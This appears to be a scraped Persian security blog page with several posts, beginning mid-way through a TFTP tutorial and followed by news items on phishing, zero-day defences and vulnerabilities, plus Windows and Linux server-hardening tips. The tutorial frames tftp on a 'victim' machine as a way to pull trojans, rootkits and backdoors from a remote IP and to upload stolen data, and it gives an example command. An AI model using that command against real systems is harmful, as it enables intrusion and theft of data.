خوب در اين حال يك ايكون هم در قسمت systry سيستم شما ظاهر خواهد شد و اگر firewall هم داشته باشيد از شما سوال مي كند كه اجازه مي دهيد كه اين نرم افزار روي يك پرت listing شود شما درخواست را پاسخ مثبت دهيد و اين نرم افزار روي پرت 69 به حالت گوش دهنده آماده به كار مي شود ولي بايد شما يك تنظيم ديگر نيز انجام دهيد تا همه چيز آماده شود شما در اين مرحله بايد base directory را نيز براي اين نرم افزار مشخص كنيد.
base directory چيست:
base directory دايركتوري است كه اين نرم افزار به عنوان دايركتوري براي عمليات ارسال و دريافت از ان استفاده مي كند يعني اگر چيزي را دانلود كنيد در اين دايركتوري قرار مي گيرد و اگر چيزي در اين پوشه باشد با ذكر نام آن مي توانيد آن را upload كنيد براي مشخص كردن اين پوشه كه به طور پيش فرض mydocument شما مي باشد بايد دكمه settings را كليك كنيد و در پنجره باز شده(شكل زير

در قسمت بالي پنجره آدرس بيس دايركتوري خود را وارد كنيد و روي دكمه Ok كليك كرده و ديگر همه چيز مهياست براي كار با قسمت كلاينت يعني خود TFTP .

Tftp يك نرم افزار تحت كنسول است يعني حالت متني دارد و در شل اجرا مي شود و شما مي توانيد به راحتي از اين نرم افزار كه همراه كامپيوتر قرباني است براي مقاصد خود استفاده كنيد صورت كلي اين نرم افزار بدين صورت است:
Tftp –I HostName [Get/Put] Source Destination
كه سويچ I ترتيب انقال فايل به صورت باينري رو مي ده (البته من مي گم انتقال فايل دقيقا منظورم كلمه انتقال نيست بلكه فقط يك تصوير از فايل ارسال مي شه مثل دستگاه فكس نه اينكه كل فايل از سرور move بشه روي اون كامپيوتر و ديگر اثري از فايل روي سرور نباشه) اگر هم نوشته نشه فكر مي كنم كه فايل به صورت اكتال انتقال داده مي شه در اين مورد دقيقا مطمئن نيستم.
HostName هم آدرس آي پي كامپيوتر سرور است يعني همون كامپيوتري كه TFTPD روش Run شده get براي هنگامي است كه شما مي خواهيد يك فايل رو بفرستيد براي كامپيوتر قرباني و put هنگامي استفاده ميشه كه بخواهيد يك فايل رو روي كامپيوتر خود دانلود كنيد درست عكس زماني است كه شما روي كامپيوتر خود عمل دانلود و آپلود رو انجام مي دهيد. Source آدرس فايل مورد نظر شما براي عمليات آرسال يا دريافت است Destination هم آدرس مقصد است.
مثال:
Tftp –I 213.176.108.156 get trojen.exe c:trojen.exe
كه اين دستور باعث مي شه كه فايلي به اسم trojen.exe از basedirectory كامپيوتري با ip 213.176.108.156 به درايو c: كامپيوتري كه دستور بالا در اون اجرا شده كپي بشه.
به همين سادگي شما مي تونيد trojen , rootkit , backdoor و هر چيز دلخواه ديگري روي كامپيوتر مورد نظر خود دانلود و يا هر اطلاعاتي كه نياز داريد از آن آپلود كنيد.

______بابک بوتر______ بازدید : 109 یکشنبه 17 اردیبهشت 1391 نظرات (0)

 

راهکارها هک گذشته،قربانیان امروز
 
 
در گذشته دور فردی که میتوانست ایدی طرف مقابل را توی مسنجر یاهو هک کند یا پسوردش را بیابد هکر میدونستن و هر کس پسورد بیشتری پیدا میکرد به قول معروف هکر ماهری بین هکرهای دیگر شناخته میشد.

بعد از گذشت زمان و روی کار امدن نسخه های جدید مسنجر کم کم هک کردن ایدی کمی سخت شد و هکرها دست به دامن طراحان و برنامه نویسان شدند.

طراحان یا برنامه نویسان نقشی زیادی در هک شدن افراد کم اطلاع از جهان اینترنت داشتند.

افراد سودجو با استفاده از برنامه های پسورد سندر (trojan) و یا برنامه هایی که تمام دکمه های زده شده و صفحات دیده شده توسط قربانی را برای هکر ارسال میکرد (Keylogger) که قبلا توسط برنامه نویسان نوشته شده بود و در دست رس همه افراد قرار گرفته بود کار خودشون را راحت تر کردند.

نیاز هم به اطلاع خاصی نداشت فقط با دانلود نرم افزار نرم افزار جاسوسی ،تنظیم آن و ارسال برای قربانی میتوانست در کمترین زمان پسورد طرف مقابل را در اختیار داشته باشد.

طراحان نیز با درست کردن صفحات تقلبی شبیه به صفحات ورود به ایمیل و ... مشخصات فرد را گرفته و در کمترین زمان تغییر میدادند.

ولی امروزه با روی کار آمدن نسخه های جدید مسنجر ها مثل یاهو و... دیگر برنامه نویسان وقت خود را برای نوشتن برنامه هایی مثل password sender نمیگذارند چون با تغییر ورژن های بالاتره مسنجر این نرم افزار ها از کار میافتند.

و فقط تنها راه برای به دست اوردن پسورد ایمیلهای افراد ،همان صفحات تقلبی شد.این صفحات به گونه ای هستند که طرف سود جو با جذب کردن بیننده ان را وادار به دادان مشخصات فردی میکند و بعد به گونه ای که قربانی شک نکند به کار خود خاتمه میدهد.

با اینکه این راهکارها قدیمی شده است ولی دیگر نیاز به برنامه نویسی و یا فرستادن تروجان نیست و همیشه نیز کار آمد خواهد بود.ولی امروزه با اطلاع رسانی کافی از مدیران امنیتی و کسب تجربه خود افراد کمتر افرادی قربانی این حقه ها میشوند.

چندی پیش نیز مدیر تیم هکری مافیا طی گزارشی به آژانس خبری پرشین هک در مورد حقه ای جدید در اقفال افراد بیان نمودند.

این مدیر با ابراز تاسف و نگرانی اعلام کرد :

که در این صفحه عکسهای متعدد و به نظر جالب برای بیننده وجود دارد که برای بزرگ تر نشان دادن آن باید روی عکسها کلیک شود.بعد از کلیک به صفحه جدیدی که در آن یک فیک پیچ (صفحه تقلبی) جا سازی شده است میروید.

در این صفحه از شما خواسته شده است که ایمیل و پسورد یاهو خود را وارد نمایید.که با وارد کردن مشخصات خود  باعث میشوید به دست خودتان ایمیل و پسورد شخصیتان دو دستی تقدیم هکر شود.

ولی اگر خالی بگذارید و یا به طور فرضی و دروغین کادرها را پر کنید به صفحه جدیدی میروید که به طور دروغین توسط فرد سودجو فیلتر گذاری شده است."

مدیر این تیم هکری در ادامه افزود: هکر که ایمیل ان به این شرح است zenhari@gmail.com از حقه ای قدیمی استفاده کرده است ولی ممکن است افراد بدون اطلاع از این نوع حقه ها گرفتار شوند.

در آخر مدیر این تیم به آژانس خبری پرشین هک اعلام داشت که این تیم طی اقدامی به شناسایی این صفحات پرداخته و انها را برای عموم گزارش میدهد.

ما نیز به نوبه خودمان از این مدیر تشکر کرده و امیدواریم تمام تیمهای هکری و امنیتی ایران بعد از فکر به امینت سرورها به امنیت افراد در اینترنت نیز اهمیت خاصی قرار دهند.

 

______بابک بوتر______ بازدید : 140 یکشنبه 17 اردیبهشت 1391 نظرات (1)
 
براي مقابله با حملات اينترنتي لايه‌هاي دفاعي متعددي مورد نياز است
 
 

بر اساس نظر كارشناسان شركت‌ها مي‌توانند براي كاستن خطرها و تهديدهاي جديد اينترنتي از لايه‌هاي دفاعي متعدد بهره بگيرند.

به گزارش ایسنا حفره‌ي امنيتي مكان نماي متحرك ويندوز كه مايكروسافت هفته‌ي گذشته وصله‌ي امنيتي آن را منتشر كرد،‌ گسترش نگراني‌هاي زيادي را موجب شد زيرا كوشش براي بهره‌برداري از آن قبل از فراهم شدن وصله‌ي آن، آغاز شده بود.

نظر كارشناسان بر اين است كه شركت‌ها مي‌توانند براي كاستن ريسك‌هاي ايجاد شده از سوي اين آسيب پذيري و ديگر تهديدات امنيتي كه zero-day ناميده مي‌شود، تلاش‌هاي متنوعي را به عمل آورند.

مديران IT و تحليلگران هشدار دادند اقدامات موجود قابل اطمينان نيستند و وصله كردن يك حفره‌ي امنيتي همچنان مطمئن‌ترين روش براي حفاظت از سيستم‌ها در برابر هكرهايي است كه خواهان بهره گيري از آن‌ها هستند اما به كارگيري لايه‌هاي دفاعي متعدد، جزو اساسي استراتژي‌ها براي از عهده برآمدن در مقابل تهديدهايي است كه براي آن‌ها وصله‌ي فوري در دسترس نيست.

به عنوان مثال يك شركت از نرم‌افزاري بهره مي‌گيرد كه مي‌تواند سيستم‌هاي در معرض خطر را به جاي تشخيص آلودگي از راه جست‌وجوي علامت شناسايي ويروس، بر اساس رفتارهاي غير معمولي كه از خود نشان مي‌دهند، به سرعت تشخيص دهد.

اين ابزار شركت كان سنتري نت‌ورك به كارمندان IT امكان كنترل ارتباطات برقرار شده توسط رايانه با سيستم‌هاي ديگر را مي‌دهد و اين امر به كاستن خطر آلوده شدن يك LAN ( شبكه رايانه‌هاي محلي ) از طريق يك رايانه آلوده كمك مي‌كند.

در اين مدل جديد،‌ قوانين خودكاري وجود دارند كه ميزاني را كه يك سيستم مي‌تواند به شبكه‌ي دسترسي پيدا كند را مشخص مي‌كنند، همچنين اين قوانين دستگاههايي را كه رايانه ميتواند بر اساس نيازهاي كاريكاربر به آن‌ها مرتبط شود، محدود مي‌كند.

راه ديگر براي به حداقل رساندن تهديدات جديد به كارگيري سياست‌هاي جديد براي فيلترينگ ضميمه ايميل‌هاست كه هكرها اغلب از آن‌ها براي اجراي نرم افزارهاي مخرب استفاده مي‌كنند.

تحليل‌گران براي فيلتر ضميمه‌هاي نوع GIFS، JPEGS، WMVS، و ديگر انواع غير ضروري ضميمه‌ها از ايميل‌هاي داخلي و خارج شبكه‌ي خود به شركت‌ها توصيه‌ي فراواني كرده‌اند و به اعتقاد آن‌ها، اطمينان از اين كه تنها برخي از انواع ضميمه‌ها براي اهداف مخرب مورد استفاده قرار مي‌گيرند، اشتباه است.

به گفته‌ي آن‌ها ضميمه‌هاي GIFS و JPEGS بي‌خطرند مگر زماني كه هكرها شروع به پنهان كردن كدهاي مخرب در آن‌ها مي‌كنند. پس نبايد خطرناك يا بي خطر آن‌ها را مورد لحاظ قرار داد بلكه بايد ديد شركت به چه احتياج دارد.

هكرهاي خرابكار علاقه‌مند به كارگيري از ايميل HTML هستند زيرا به آساني به آن‌ها امكان پنهان سازي و پياده كردن حمله به سيستم‌ها را مي‌دهند؛ در حال حاضر مشتري‌هاي ايميل مايكروسافت شامل اوت لوك اكسپرس و ويندوز ميل براي ويستا در برابر حملاتي كه فايل مخرب ANI را در يك پيام HTML وارد كرده‌اند، آسيب پذير هستند.

غير فعال كردن ايميل HTML در سيستم‌ها به كاستن ريسك و خنثي كردن بسياري از حملات فيشينگ كه تلاش مي‌كنند كاربر را به كليك بر روي لينك‌هاي مرتبط با وب سايت‌هاي مخرب ترغيب كنند، كمك مي‌كنند.

بر اساس اين گزارش مراقبت از ترافيكي كه از شبكه شركت به خارج در جريان است مهم است،‌ بسياري از اسب‌هاي تروجان و برنامه‌هاي بوت با سيستم‌هاي كنترل از راه دور مرتبط مي‌شوند تا دستور العمل‌هاي وظايف بعدي و اطلاعاتي را كه بايد ارسال كنند، را دريافت كنند؛ استفاده از پروكسي‌هاي بيروني و فايروال‌ها براي يافتن و مسدود كردن اين ارتباطات مي‌تواند مانع ارتباط آن‌ها با منبع‌شان شود.

همچنين شركت‌ها بايد در پارامتر شبكه‌هاي خود، قابليت default deny را به كار بگيرند تا تنها ترافيك خاصي در داخل و خارج درگاه‌هاي شبكه در جريان باشد و مديران مي‌توانند براي تعيين ترافيكي كه اجازه‌ي ورود و خروج به شبكه را دارد، تمام فعاليت روترهاي داخلي و خارجي را براي مدتي ثبت كنند تا تصويري از آن چه به طور معمول مي‌تواند منتقل شود براي آن‌ها ترسيم شود.

 

______بابک بوتر______ بازدید : 93 یکشنبه 17 اردیبهشت 1391 نظرات (0)

 

مشکل امنیتی در یاهو 360
 

در سالهای اخیر شاهد هک شدن تعداد زیادی از آیدی های یاهو می باشیم که علت آن وجود یک مشکل امنیتی در یاهو 360 می باشد.

بنا به گزارش آژانس خبری پرشین هک از تیم فنی سایت هک، تکنیک جدید مورد استفاده هکر ها ناشی از ضعف برنامه نامه رسان یاهو 360 و اجرای اسکریپت های فرد مهاجم است. هکر با ارسال نامه هایی حاوی اسکریپت redirect میتواند کاربر را فریب داده و وی را به صفحه مورد نظر خود هدایت نماید و کاربران نا آشنا با مسائل امنیتی نیز بدون توجه به آدرس دقیق صفحه در مرورگر خود، در دام تکنیک قدیمی صفحه تقلبی (Fake Page) افتاده و آیدی و رمز عبور خود را در اختیار هکر قرار می دهند. بنابر گزارش تیم فنی سایت هک این اسکریپت بر روی تمامی مرورگرهای وب قابل اجرا می باشد و کاربران باید به آدرس سایتی که در آن نام کاربری (ID) و کلمه عبور خود را وارد میکنند توجه نمایند و از باز کردن نامه های ناشناس و مشکوک در یاهو 360 خودداری نمایند.

______بابک بوتر______ بازدید : 131 یکشنبه 17 اردیبهشت 1391 نظرات (0)

 

حفره‌هاي امنيتي نرم‌افزارها به چه ميزان كاربران اينترنت را تهديد مي‌كنند؟
 
 
حتما تاكنون بارها در اخبار مربوط به رايانه‌ها و اينترنت تيترهاي مبني بر شناسايي حفره‌هاي امنيتي جديد در نرم‌افزارها، انتشار "پچ"هاي اصلاحي و هشدارهاي امنيتي شركتهاي مختلف را مشاهده كرده‌ايد. اما اين ايرادهاي امنيتي به راستي تا چه ميزان كاربران را تهديد مي‌كنند؟ شركت "مايكروسافت" به عنوان بزرگترين توليدكننده نرم‌افزار در جهان در برنامه‌اي منظم، در دومين سه‌شنبه از هر ماه با تبليغات گسترده به انتشار مجموعه‌اي از جديدترين نرم‌افزارهاي اصلاح‌كننده ايرادهاي امنيتي تازه شناسايي شده در محصولات خود مي‌پردازد و ساير شركتهاي بزرگ نرم‌افزاري نظير، "اپل"، "آدوب"، "ريل نتووركس"، و حتي توليدكنندگان ضد ويروسها و نرم‌افزارهاي امنيتي نيز هر از چند گاهي به انتشار اين "پچ"هاي اصلاحي مجبور مي‌شوند.

اغلب حفره‌هاي امنيتي نرم‌افزارهاي شركتهاي بزرگ ابتدا توسط كارشناسان شركتهاي امنيتي نظير "سكونيا"، "سوفوس" و "مسج لبز" شناسايي شده و پس از مدتي خود توليدكنندگان اين نرم‌افزارها به انتشار اصلاح‌كننده هايي براي آنها اقدام مي‌كنند.

اما به راستي حفره‌هاي امنيتي نرم‌افزارها اگر اصلاح نشده رها شوند، تا چه ميزان كاربران را تهديد مي‌كنند؟
حفره‌هاي امنيتي معمولا داراي يك ويژگي مشترك هستند كه عبارت است از آسيب پذير ساختن رايانه در برابر نفوذ هكرها. اين بدان معناست كه افرادي همواره در تلاشند تا روشهايي جديد و موثرتر براي نفوذ به رايانه‌هاي كاربران از راه دور و بدست گرفتن كنترل اين رايانه‌ها پيدا كنند و ايرادهاي امنيتي نرم‌افزارها، دقيقا همان چيزي است كه هكرها براي راه يافتن به رايانه‌ها نياز دارند.

هكرها معمولا پس از راه‌يابي به رايانه‌هاي كاربران، كدهاي نرم‌افزاري مخربي را كه از پيش آماده كرده‌اند در رايانه اجرا كرده و پس از آن كنترل رايانه را گاه به صورت جزيي و گاه به طور كامل در اختيار خود مي‌گيرند.

اين بدان معناست كه اگر رايانه شما به اصلاح هك شده باشد، هكر مذكور مي‌تواند هر كاري را كه شما با رايانه خود انجام مي‌دهيد، انجام داده و به تمامي اطلاعات موجود در هارد ديسك رايانه شما دسترسي داشته باشد.

هكري كه با استفاده از حفره‌هاي امنيتي سيستم‌عامل، مرورگر و يا نرم‌افزارهاي موجود در رايانه شما به رايانه‌تان راه يافته، حتي مي‌تواند بدون اراده شما عكسهاي ديجيتالي خانوادگي موجود در هارد ديسكتان را مشاهده كند، مجموعه‌هاي فايلهاي ‪ MP3‬را كه به زحمت جمع‌آوري كرده‌ايد پاك كند و يا حتي با استفاده از كدهاي مخرب خود، رايانه شما را گاه و بي‌گاه روشن و خاموش كند.

با اين وجود، كاربران در اغلب مواقع متوجه هك شدن رايانه خود نمي‌شوند زيرا هكرها از انجام اعمالي كه كاربر را متوجه آلوده بودن رايانه كند خودداراي مي‌كنند تا بتوانند بيشترين استفاده را از رايانه هك شده ببرند.

امروزه معمولا تبهكاران اينترنتي عمدتا با اهداف مادي رايانه‌هاي كاربران را هك مي‌كنند. اين افراد معمولا با بهره‌گيري از حفره‌هاي امنيتي سيستم‌عاملها، مرورگرهاي اينترنتي و ساير نرم‌افزارها به رايانه‌ها راه يافته و با استفاده از انواع كدهاي مخرب به اقدامات تبهكارانه مشغول مي‌شوند.

به طور مثال هكرها مي‌توانند با همين روش و با نصب نرم‌افزارهاي مخرب موسوم به "روت كيت"ها(‪ (Rootkit‬و همچنين نرم‌افزاري جاسوسي رباينده لغات تايپ شده توسط كاربران(‪ (Keystroke Loggers‬در رايانه كاربر، به اسم رمزها و كلمات عبوري كه كاربران براي راه‌يابي به صندوق پست الكترونيك و يا حسابهاي بانكي خود از آنها استفاده مي‌كنند، دسترسي پيدا كنند.

در برخي موارد حتي هكرها با آلوده كردن ده‌ها هزار رايانه مختلف در نقاط مختلف جهان، آنها را به رايانه‌هاي "بات‌نت" و يا "زامبي" تبديل كرده و همانند ارتشي براي مقاصد مختلف، از جمله حملات موسوم به "دي.او.اس" به سايتهاي اينترنتي و از كار انداختن آنها، مورد استفاده قرار مي‌دهند.

يكي از ديگر خطرات حفره‌هاي امنيتي نرم‌افزارها، افزايش احتمال آلوده شدن رايانه‌هاي كاربران به كدهاي مخرب "اسپاي‌ور" و يا "اد-ور" است.

"اسپاي‌ور"(‪ (Spyware‬و "اد-ور"(‪ (Adware‬به طور كلي به نرم‌افزارهاي مخربي گفته مي‌شود كه با سوء‌استفاده از حفره‌هاي امنيتي سيستم‌عاملها و مرورگرهاي اينترنتي، بدون اراده كاربران از برخي سايتهاي اينترنتي و يا خدمات به اشتراك‌گذاري فايل در اينترنت به رايانه‌ها راه يافته و باعث باز شدن پيايي پنجره‌هاي تبليغاتي، تغيير دايمي برخي مشخصه‌هاي مرورگرهاي اينترنتي (به ويژه اينترنت اكسپلورر) از جمله آدرس هوم پيج، كند شدن رايانه، ربوده شدن كلمات عبور و اسم رمزهاي مورد استفاده كاربران و عدم عملكرد برخي قابليتهاي سيستم‌عامل "ويندوز" مي‌شوند.

استفاده از مرورگرهاي اينترنتي "پچ" نشده براي گشت و گذار در اينترنت تقريبا به مفهوم آلودگي حتمي به انواع مختلف "اسپاي‌ور" است به طوري كه تحقيقات اخير نشان داده هم‌اكنون بيش از ‪ ۸۰‬درصد از رايانه‌هاي شخصي و يا تجاري جهان دست كم به يك نوع اسپاي‌ور مبتلا هستند.

كدهاي مخرب هكرها و "اسپاي‌ور"ها اغلب بدون اطلاع كاربر از پهناي باند اينترنت او براي دريافت و ارسال اطلاعات استفاده مي‌كنند كه اين امر به خصوص براي كاربراني كه از اتصالات اينترنتي داراي پهناي باند محدود "دايل آپ" استفاده مي‌كنند، سبب كندي هرچه بيشتر سرعت اينترنت مي‌شود.

با توجه به موارد فوق، به نظر مي‌رسد حفره‌هاي امنيتي كه هر از چندگاهي در نرم‌افزارهاي مختلف شناسايي مي‌شوند، تهديدي جدي براي كاربران هستند و عقل سليم حكم مي‌كند اگر چنانچه دريافت و نصب مداوم "پچ"هاي اصلاحي اين حفره‌هاي امنيتي براي شما امري دشوار و وقت گير به نظر مي‌رسد، دست كم سعي كنيد تا حد امكان از جديدترين نگارشهاي نرم‌افزارهاي مختلف استفاده كنيد زيرا در هر نگارش جديد از هر نرم‌افزار معمولا تمامي حفره‌هاي امنيتي شناسايي شده در نگارشهاي قبلي اصلاح و برطرف شده‌است.

 

مرتضی(Germany) بازدید : 153 یکشنبه 17 اردیبهشت 1391 نظرات (1)

 

BlackICE PC Protection

نام يک ديوار آتش معروف و قدرتمند ميباشد که سيستم شما رو کاملا امن نگه ميداره و با توانايی پيشرفته ای که در زمينه ی پيدا کردن حفرهاي نفوذی داره راه نفوذ به سيستم رو بر همه کس و همه چيز ميبنده!


مقوله برقراری امنیت سیستم های کامپیوتری امروزه به عنوان یکی از مهمترین اصول در نگهداری یک شبکه و یا یک سیستم کامپیوتری می باشد. حفاظت از سیستم هایی که اطلاعات مهم تجاری و یا شخصی افراد در آن ها نگهداری می شوند و جلوگیری از دسترسی افراد غیر مجاز و هکرها به سیستم های کامپیوتری در زمره اموری می باشند که بسیاری از شرکت ها و افراد حقیقی نیز در طول سال با صرف هزینه هایی به آن ها عمل می کنند. بسیاری از نرم افزارهای امنیتی موجود در اینترنت که توسط کمپانی های امنیتی برای کاربران و شرکت ها فراهم شده است توانایی این را دارند تا حد زیادی از حملات و نفوذ های موجود به سیستم های کامپیوتری جلوگیری نمایند.


در این مطلب یکی از نرم افزاری را از یک شرکت معتبر قدیمی به شما معرفی می کنیم.


ISS BlackICE PC Protection نام یک نرم افزار حفاظتی می باشد که به وسیله آن کاربران قادر به برقراری یک امنیت مناسب بر روی سیستم های خود خواهند بود. وجود ابزارهای مختلف برقراری امنیت و مدیریت امنیتی سیستم در این نرم افزار ، این توانایی را به کاربر می دهد تا خود برقرار کننده امنیت خود و حافظ اطلاعات مهم خود باشد. این نرم افزار دارای ابزارهای مختلفی می باشد که از جمله آن ها می توان به دیوار آتش حفاظتی قدرتمند آن اشاره نمود که حملات هکرها را به سستم دفع و تقاضاهای مخرب آن ها به سیستم را Block می کند. این نرم افزار محصولی از IBM Internet Security Systems می باشد.
                            



لطفا برای دانلود به ادامه ی مطلب بروید



مرتضی(Germany) بازدید : 116 شنبه 16 اردیبهشت 1391 نظرات (0)

 

Netbios را از TCP/IP جدا کنید


بطور پیش فرض Netbios به TCP/IP مرتبط است لذا نفوذگران قادر به استفاده از فایلهای به اشتراک گذارده شده دستگاه شما هستند لذا


با جدا سازی Netbios از TCP/IP قادر به محافظت از دستگاه خود خواهید شد. در ابتدا NetBEUI را به همراه TCP/IP نصب کنید. حال


Dial-up Adapter را که مورد نیاز برای ارتباط به اینترنت است انتخاب نمایید و به قسمتProperties بروید. به Binding Tab رفته و کلیه


گزینه ها بجز TCP/IP Dialup Adapter را غیرفعال نمایید و OK را بزنید. حال TCP/IP > Dial-up Adapter را انتخاب کنید و به Properties


آن بروید. کلیه پیغام های خطا را حذف کنید و دکمه Binding را بزنید. کلیه گزینه ها را در این قسمت غیر فعال نمایید و OK را بزنید. پیغام


خطای دیگری نمایش داده خواهد شد .اینبار گزیمه NO را انتخاب کنید. Network Properties را ببندید و کامپیوترتان را Restart کنید. این


عملیات Netbios را از TCP/IP مجزا خواهد کرد و شما دیگر نباید نگران دسترسی به فایلهای به اشتراک گذارده شده را از طریق اینترنت

باشید.


 

مرتضی(Germany) بازدید : 132 شنبه 16 اردیبهشت 1391 نظرات (0)

 

رمزگذاری و امنیت درایورها:


اگر از سیستم فایل NTFS در Windows 2000 یا NT استفاده می کنید قادر به محدودکردن دسترسی کاربران هستید. برای ایمن سازی


درایور کلیک راست روی پارتیشن NTFS مورد نظر خود کنید و Properties انتخاب نمایید. در Properties روی دکمه Security کلیک کنید


و دکمه Add را برای نمایش Add Users,computers or groups بزنیددر بالای پنجره روی کاربرانی که می خواهید دسترسی به درایور


داشته باشند آمده و Add را بزنید. این کار را برای افزودن کاربران بیشتر ادامه دهید.

مرتضی(Germany) بازدید : 269 شنبه 16 اردیبهشت 1391 نظرات (0)

از کلمات عبور پیچیده استفاده کنید


کلمات عبور ساده بزرگترین مشکل امینتی را برای سرور شما به وجود می آورند. داشتن کلمات عبور امن و پیچیده (چه برای خود سرور و چه برای کاربرانی که روی سرور قرار دارند) بسیار با اهمیت است.به عنوان مثال اگر کاربر شما ازکلمه ی عبور ی استفاده کند که به راحتی توسط هکر ها قابل حدث زدن باشد در وحله ی اول باعث deface شدن سایت خود شده و اعتبار شرکت شما رو زیر سوال می برد دوم ممکن است از طریق این سایت برای ارسال ویروس و هرزنامه استفاده بشه یا بویسله ی local exploit ها به بقیه سایت ها آسیب برسونه.

* شما می تونید با ویرایش تنظیمات مربوط به کلمات عبور در فایل /etc/login.defs بر اساس نوع کار شما با سرور و درجه ی امنیتی که برای خود در نظر می گیرید کاربران مجبور به داشتن کلمات عبور ایمن کنید.توضیحات کامل در مورد هر یک از پارامتر های فایل login.defs داخل خود فایل و در بالای هر کدام از پارامتر ها موجود می باشد.
معمولا کلمات عبور باید حداقل ۸ حرفی و شامل حرف – عدد و علائم باشند. هیچ وقت از کلمات معنی دار یا تاریخ های مهم استفاده نکنید. اگر می خواهید امن بودن کلمه عبور خود را بررسی کنید می تونید اون را با استفاده از این نرم افزار (http://www.openwall.com/john) تست کنید . اگر ظرف ? – ? ساعت کلمه عبور شما crack شد یعنی کلمه عبور شما امن نیست.
همین سایت یک ابزار دیگه برای بررسی طول کلمات عبور کاربران سرور ساخته است بوسیله ی (http://www.openwall.com/passwdqc) می توانید لیست کاربرانی که از کمات عبور نا امن استفاده میکنند را پیدا کنید و به آنها هشدار دهید .


۳- وب سرور خود را secure کنید
مهمترین قسمتی که با عموم کاربران در ارتباط است و بیشتر مورد حمله و نفوذ قرار می گیرد همان webserver است .
یکی از بهترین ماژول هایی که برای جلوگیری از استفاده ی نابجا از وب سرور استفاده می شود mod_security است که در همین وب لاگ بار ها در موردش صحبت کردیم. البته خود اون فقط یک ابزاره و بقیش برمیگرده به هنر مدیر سرور در طراحی یک سری rule مناسب مخصوص اون سرور برای اطلاعات بیشتر به سایت های http://www.modsecurity.org و http://www.gotroot.com سر بزنید.
توجه کنید که همیشه موقع compile کردن apache گزینه ی suexec حتما فعال باشد. فعال کردن این گزینه به معنی اجرا شدن اسکریپت های CGI تحت owner خود (مالک فایل) می باشد. این گزینه باعث جلوگیری از دسترسی فایل های CGI به فایل های سیستم میشه و همچنین برای جلوگیری از فایل هایی که باعث در سرور می شود بسیار مناسب است.
همچنین بعضی ها اعتقاد داند که باید PHPsuexec هم روی سرور فعال باشه این گزینه باعث میشه که فایل های php هم تحت کاربر خودشون اجرا بشن و با عث بالا بردن امنیت فایل های سیستمی و جلوگیری از استفاده نا بجا از این گونه اسکریپت ها میشه .
می تونید apache رو بوسیله ی دستور /scripts/easyapach که به شما محیط نیمه گرافیکی میده یا با استفاده از خود whm که محیط کاملا گرافیکی داره compile کنید.
با استفاد از فعال کردن گزینه ی open_basedir در قسمت Tweak Security در WHM دسترسی کاربران را از مشاهده ی فایل هایی که خارج پوشه ی مربوط به خودشون هست بگیرید.
اگر خیلی از امنیت سرور خود حراس دارید و نمی توانید تک تک دسترسی ها مسدود کنید می توانید به راحتی در فایل php.ini گزینه ی safe mode را فعال کنید . Safe_mode=on این گزینه هر لحظه چکمیکنه که آیا کسیکه داره این فایل رو اجرا میکنه مالک اون قسمتهست یا نه و خیلی دستورات را خود به خود مسدود میکنه . و راحت ترین راه برای بستن دسترسی های اضافی روی سروره . البته باید گم که با فعال کردن این گزینه حدود ۶۰ درصد از scriptها و کاربران به مشکل برمی خورند.

۴- پارتیشن tmp را secure کنید
بله . مخصوصا گفتم پارتیشن چون بعضی ها اصلا براش partision نمی سازند . البته اگر سرورتون را از یک دیتا سنتر درست حسابی گرفته باشید خودشون موقع نصب سیتم عامل این کار رو انجام میدن.
ولی بازهم کافی نیست در قسمت fstab سیستم باید tmp حتما با گزینه ی nosetuid بسازید یا به اصطلاح mount کنید. این گزینه باعث میشه که تک تک proccess ها با سطح دسترسی executor اجرا شوند .این سطوح دسترسی قبلا در کرنل لینوکس تعریف شده. همچنین بعد از نصب cpanel می توانید گزینه ی noexec رو هم فعال کنید. این گزینه باعث میشه که هیچ فایل اجرایی داخل tmp اجازه ی اجرا شدن نداشته باشه . بعد از اینکه این کار و انجام دادید بوسیله script از پیش آماده ی خود cpanel در آدرس /scripts/securetmp برای پارتیشن tmp خود یک symlink یا شبه لینک به /var/tmp بسازید این خودش برای حفظ امنیت tmp موثره .

۵- غیر فعال کردن compiler ها برای کاربران دیگر
۹۹ درصد کاربران نمی دونن compiler ها روی هاست به چه درد می خوه و اصلا استفاده ای از اونها ندارند پس چه بهتره برای همه ی کاربرانی که استفاده ندارند اون رو disable کنید . این کار رو می تونید در whm در قسمت Compilers Tweak انجام بدید . اکثر باگ های امینتی کشف شده نیار دارند تا همون موقع روی سرور compile بشن با غیر فعال کردن اون حال بسیاری از هکر ها رو میگیرید.

- از maildir به جای mailbox استفاده کنید
ما دونوع ذخیره سازی روی لینوکس داریم برای ایمیل ها . اولی به صورت mail box هست و دومی maildir که گزینه ی دوم بسیار از لحاظ امنیتی بهتره و باعث افزایش سرعت میل سرورتون هم میشه . البته در نسخه ی جدید cpanel به صورت پیش فرض maildir نصب میکنه ولی اگر سرورتون بیش از یک سال عمر داره و روش خاک نشسته بهتره همین حالا به maildir ارتقا بدید. قبلش از اطلاعاتتون backup بگیرید . بنده هیچ مسئولیتی در قبل از دست دادن اونها ندارم . می تونید از پشتیبانی دیتا سنترتون بخواید تا این کار رو انجام بده.

۷- سرویس های اضافی(services and daemons) را غیر فعال کنید
هر سرویس که روی سرور شما فعال باشه و به دیگران اجازه ی وصل شدن به اون وگرفتن اطلاعات به کاربران میده دارای باگ امینتی هست و اگر از اون استفاده نمی کنید باید اون رو ببندیدش . خود لینوکس هم یک سری سرویس های زائد(daemons) داره که برای یک سریس دهنده ی وب نیازی به اونها نیست .
سرویس های رو می تونید در /etc/xinetd.con ویرایش کنید .برای مثال سیستم اشتراک فایل (nfs/statd) یا سیستم مدیریت پرینت (cupsd) و خیلی daemonهای دیگه که توی آموزش مختصر مثل این نمی گنجه همش روبگم. از داخل whm در قسمت Service Manager می تونید سرویس هایی که نیار ندارید رو غیر فعال کنید . مثلا اگر از chat server خود cpanel استفاده نمی کنید اون رو غیر فعالش کنید چون خودش باعث مشکلاتی امنیتی خواهد شد .
این بخش از مهمترین کار هایی که باید یک مدیر سرور انجام بده .

۸- سرور خود را تحت کنترل داشته باشید یا مانیتور کنید


یک ادمین سرور باید به صورت ۲۴ ساعته کلیه قسمت های سرور (نرم افزار ها – فایل های کاربران و …) را تحت کنترل داشته باشد
اینکه نرم افزار های مورد استفاده روی سرور بروز هستند یا خیر و خیلی مسائل دیگر بسیار مهم هستند که این امر فقط با بررسی مداوم و سرکشی به صورت روزانه روی سرور ها عملی است.
